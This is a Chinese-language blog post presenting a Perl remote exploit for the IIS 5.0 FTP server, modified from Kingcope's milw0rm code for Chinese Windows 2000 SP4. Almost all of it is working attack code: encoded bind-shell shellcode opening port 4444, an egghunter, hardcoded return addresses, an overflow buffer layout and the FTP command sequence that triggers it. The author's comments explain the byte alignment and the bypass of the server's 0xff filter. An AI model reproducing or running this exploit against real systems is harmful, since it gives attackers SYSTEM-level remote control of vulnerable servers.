作者:Inking
因为一些字符问题,所以英文版的exp没法直接用到中文操作系统上,花了些时间修改了milw0rm上的exp,在自己的中、英文 Win2k sp4 虚拟机中测试都通过。
#!/usr/bin/perl # IIS 5.0 FTP Server / Remote SYSTEM exploit # Win2k SP4 targets # bug found & exploited by Kingcope, kcope2<at>googlemail.com # Affects IIS6 with stack cookie protection # Modded by muts, additional egghunter added for secondary larger payload # Might take a minute or two for the egg to be found. # Opens bind shell on port 4444 # http://www.offensive-security.com/0day/msftp.pl.txt use IO::Socket; $|=1; $sc = "/x89/xe2/xdd/xc5/xd9/x72/xf4/x5f/x57/x59/x49/x49/x49/x49/x43" . "/x43/x43/x43/x43/x43/x51/x5a/x56/x54/x58/x33/x30/x56/x58/x34" . "/x41/x50/x30/x41/x33/x48/x48/x30/x41/x30/x30/x41/x42/x41/x41" . "/x42/x54/x41/x41/x51/x32/x41/x42/x32/x42/x42/x30/x42/x42/x58" . "/x50/x38/x41/x43/x4a/x4a/x49/x45/x36/x4d/x51/x48/x4a/x4b/x4f" . "/x44/x4f/x47/x32/x46/x32/x42/x4a/x43/x32/x46/x38/x48/x4d/x46" . "/x4e/x47/x4c/x45/x55/x51/x4a/x44/x34/x4a/x4f/x48/x38/x46/x34" . "/x50/x30/x46/x50/x50/x57/x4c/x4b/x4b/x4a/x4e/x4f/x44/x35/x4a" . "/x4a/x4e/x4f/x43/x45/x4b/x57/x4b/x4f/x4d/x37/x41/x41"; # ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "/x00/x0a/x0d" $shell="T00WT00W" ."/xda/xde/xbd/x2d/xe7/x9b/x9f/x2b/xc9/xb1/x56/xd9/x74/x24/xf4" . "/x5a/x83/xea/xfc/x31/x6a/x15/x03/x6a/x15/xcf/x12/x67/x77/x86" . "/xdd/x98/x88/xf8/x54/x7d/xb9/x2a/x02/xf5/xe8/xfa/x40/x5b/x01" . "/x71/x04/x48/x92/xf7/x81/x7f/x13/xbd/xf7/x4e/xa4/x70/x38/x1c" . "/x66/x13/xc4/x5f/xbb/xf3/xf5/xaf/xce/xf2/x32/xcd/x21/xa6/xeb" . "/x99/x90/x56/x9f/xdc/x28/x57/x4f/x6b/x10/x2f/xea/xac/xe5/x85" . "/xf5/xfc/x56/x92/xbe/xe4/xdd/xfc/x1e/x14/x31/x1f/x62/x5f/x3e" . "/xeb/x10/x5e/x96/x22/xd8/x50/xd6/xe8/xe7/x5c/xdb/xf1/x20/x5a" . "/x04/x84/x5a/x98/xb9/x9e/x98/xe2/x65/x2b/x3d/x44/xed/x8b/xe5" . "/x74/x22/x4d/x6d/x7a/x8f/x1a/x29/x9f/x0e/xcf/x41/x9b/x9b/xee" . "/x85/x2d/xdf/xd4/x01/x75/xbb/x75/x13/xd3/x6a/x8a/x43/xbb/xd3" . "/x2e/x0f/x2e/x07/x48/x52/x27/xe4/x66/x6d/xb7/x62/xf1/x1e/x85" . "/x2d/xa9/x88/xa5/xa6/x77/x4e/xc9/x9c/xcf/xc0/x34/x1f/x2f/xc8" . "/xf2/x4b/x7f/x62/xd2/xf3/x14/x72/xdb/x21/xba/x22/x73/x9a/x7a" . "/x93/x33/x4a/x12/xf9/xbb/xb5/x02/x02/x16/xc0/x05/xcc/x42/x80" . "/xe1/x2d/x75/x36/xad/xb8/x93/x52/x5d/xed/x0c/xcb/x9f/xca/x84" . "/x6c/xe0/x38/xb9/x25/x76/x74/xd7/xf2/x79/x85/xfd/x50/xd6/x2d" . "/x96/x22/x34/xea/x87/x34/x11/x5a/xc1/x0c/xf1/x10/xbf/xdf/x60" . "/x24/xea/x88/x01/xb7/x71/x49/x4c/xa4/x2d/x1e/x19/x1a/x24/xca" . "/xb7/x05/x9e/xe9/x4a/xd3/xd9/xaa/x90/x20/xe7/x33/x55/x1c/xc3" . "/x23/xa3/x9d/x4f/x10/x7b/xc8/x19/xce/x3d/xa2/xeb/xb8/x97/x19" . "/xa2/x2c/x6e/x52/x75/x2b/x6f/xbf/x03/xd3/xc1/x16/x52/xeb/xed" . "/xfe/x52/x94/x10/x9f/x9d/x4f/x91/xbf/x7f/x5a/xef/x57/x26/x0f" . "/x52/x3a/xd9/xe5/x90/x43/x5a/x0c/x68/xb0/x42/x65/x6d/xfc/xc4" . "/x95/x1f/x6d/xa1/x99/x8c/x8e/xe0/x90"; print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2/n"; if ($#ARGV ne 1) { print "usage: iiz5.pl <target> <your local ip>/n"; exit(0); } srand(time()); $port = int(rand(31337-1022)) + 1025; $locip = $ARGV[1]; $locip =~ s//./,/gi; if (fork()) { $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '21', Proto => 'tcp'); # 自行修改以下两个地址以增强通用性, 此俩地址在我机器上测试成功 $patch = "/x7e/xd1/xf9/x7f"; $retaddr = "/x9B/xB1/xF4/x77"; # 你可以使用wordexp的这两个跳转地址 #$patch = "/x90/x80/xb7/x6f"; #$retaddr = "/xcd/x60/xb6/x6f"; # 这里也修改了, 多加了两个"K", 因为$myfindsc中 # 用了"repne scasd[edi]"指令来查找Shellcode, 多 # 加两个"K"使其四字节对齐, 否则会找不到(通用性?) $v = "KKKSEXY" . $sc . "V" x (500-length($sc)-5); # 溢出时堆栈的基本状况 # |0 |104 | 108 |112 |164 |168 |172 |176 #$c = "A" x 104 . $patch . $patch. "A" x 52 . $patch . "AAAA". $retaddr .$patch."Aa4Aa5Aa6Aa7Aa8Aa9Ab"; # #void myfindsc() #{ # __asm # { # int 3; #start: # MOV EDX,ESP; # FCMOVNBE ST,ST(2); # _emit 0xd9; # _emit 0x72; # _emit 0xf4; FSTENV [edx-0Ch] # POP EBP; # PUSH EBP; # POP EBX; # PUSH 76h; # POP EAX; #xorsc: # XOR BYTE PTR DS:[EBX+28h],AL; patch "decode" 的0xff #findsc: # MOV EAX,66666666h; # SUB EAX,66566666h; # PUSH EAX; # POP EDI; # PUSH 21212121h; # POP ECX; # MOV EAX,59584553h; # REPNE SCAS DWORD PTR ES:[EDI]; #decode: # _emit 0x89; # _emit 0xE7; JMP EDI # } #} # # #void main() #{ # myfindsc(); #} # # 修改用于定位Shellcode的代码, 由于该代码需要调 # 用call或者jmp等指令以跳转到Shellcode的地方, 此 # 类指令包含了0xff, 会被IIS过滤, 所以这里采用了自 # 修改的形式将0xff patch掉. 本来想要alpha2加密, # 但是加密后内容太长. $myfindsc = "/x8b/xd4/xdb/xd2/xd9/x72/xf4/x5d/x55/x5b/x6a/x76/x58". "/x30/x43/x27/xb8/x66/x66/x66/x66/x2d/x66/x66/x5F/x66". "/x50/x5f/x68/x21/x21/x21/x21/x59/xb8/x53/x45/x58/x59". "/xf2/xaf/x89/xe7"; $c = $myfindsc . "A" x (104 - length($myfindsc)) . $patch . $patch. "/xEB/x8E/x44/x44"."A" x 48 . # |<-- 第二次跳转: 到这里后最终跳到$myfindsc $patch . "AAAA". $retaddr . $patch . "A" x 16 ."/xE2/xAA"."NN"; # |<-- 第一次跳转: 函数返回以后经过跳转来到这里, 但是$myfindsc太远, 就又跳了一次 $x = <$sock>; print $x; print $sock "USER anonimoos/r/n"; $x = <$sock>; print $x; print $sock "PASS $shell/r/n"; $x = <$sock>; print $x; print $sock "USER anonimoos/r/n"; $x = <$sock>; print $x; print $sock "PASS $shell/r/n"; $x = <$sock>; print $x; print $sock "USER anonymous/r/n"; $x = <$sock>; print $x; print $sock "PASS anonymous/r/n"; $x = <$sock>; print $x; print $sock "MKD w00t$port/r/n"; $x = <$sock>; print $x; print $sock "SITE $v/r/n"; # We store shellcode in memory of process (stack) $x = <$sock>; print $x; print $sock "SITE $v/r/n"; $x = <$sock>; print $x; print $sock "SITE $v/r/n"; $x = <$sock>; print $x; print $sock "SITE $v/r/n"; $x = <$sock>; print $x; print $sock "SITE $v/r/n"; $x = <$sock>; print $x; print $sock "CWD w00t$port/r/n"; $x = <$sock>; print $x; print $sock "MKD CCCC". "$c/r/n"; # 这里也被修改了, 多加了个C, 用于4字节对齐 $x = <$sock>; print $x; print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "/r/n"; $x = <$sock>; print $x; # TRIGGER print $sock "NLST $c*/../C*//r/n"; $x = <$sock>; print $x; } else { my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); die "Could not create socket: $!/n" unless $servsock; my $new_sock = $servsock->accept(); while(<$new_sock>) { print $_; } close($servsock); } #Cheerio, # #Kingcope- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论